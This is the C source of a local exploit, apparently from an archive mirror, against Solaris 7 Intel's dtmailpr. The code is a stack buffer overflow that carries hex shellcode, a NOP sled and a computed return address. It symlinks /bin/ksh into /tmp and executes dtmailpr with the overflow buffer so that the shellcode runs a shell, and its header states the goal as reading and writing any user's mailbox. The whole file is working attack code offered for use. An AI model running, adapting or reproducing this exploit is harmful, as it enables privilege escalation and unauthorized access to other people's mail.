home *** CD-ROM | disk | FTP | other *** search
- /*=============================================================================
- Solaris dtmailpr exploit for Solaris7 Intel Edition
- The Shadow Penguin Security (http://shadowpenguin.backsection.net)
- Written by UNYUN (shadowpenguin@backsection.net)
- Descripton:
- Local user can read/write any user's mailbox
- =============================================================================
- */
-
- #include <stdio.h>
-
- #define RETADR 1266
- #define RETOFS 0x1d88
- #define EXPADR 300
- #define NOP 0x90
- #define MAXBUF 2000
-
- unsigned long get_sp(void)
- {
- __asm__(" movl %esp,%eax ");
- }
-
- char exploit_code[2000] =
- "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06"
- "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90"
- "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0"
- "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33"
- "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec"
- "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89"
- "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50"
- "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2"
- "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4"
- "\x04\xe8\xc9\xff\xff\xff/tmp/xx";
-
- main()
- {
- static char buf[MAXBUF+1000];
- FILE *fp;
- unsigned int i,ip,sp;
-
- putenv("LANG=");
- sp=get_sp();
- system("ln -s /bin/ksh /tmp/xx");
- printf("esp = 0x%x\n",sp);
- memset(buf,NOP,MAXBUF);
- ip=sp-RETOFS;
- printf("eip = 0x%x\n",ip);
- buf[RETADR ]=ip&0xff;
- buf[RETADR+1]=(ip>>8)&0xff;
- buf[RETADR+2]=(ip>>16)&0xff;
- buf[RETADR+3]=(ip>>24)&0xff;
- strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));
- buf[MAXBUF-1]=0;
- execl("/usr/dt/bin/dtmailpr","dtmailpr","-f",buf,0);
- }
-
-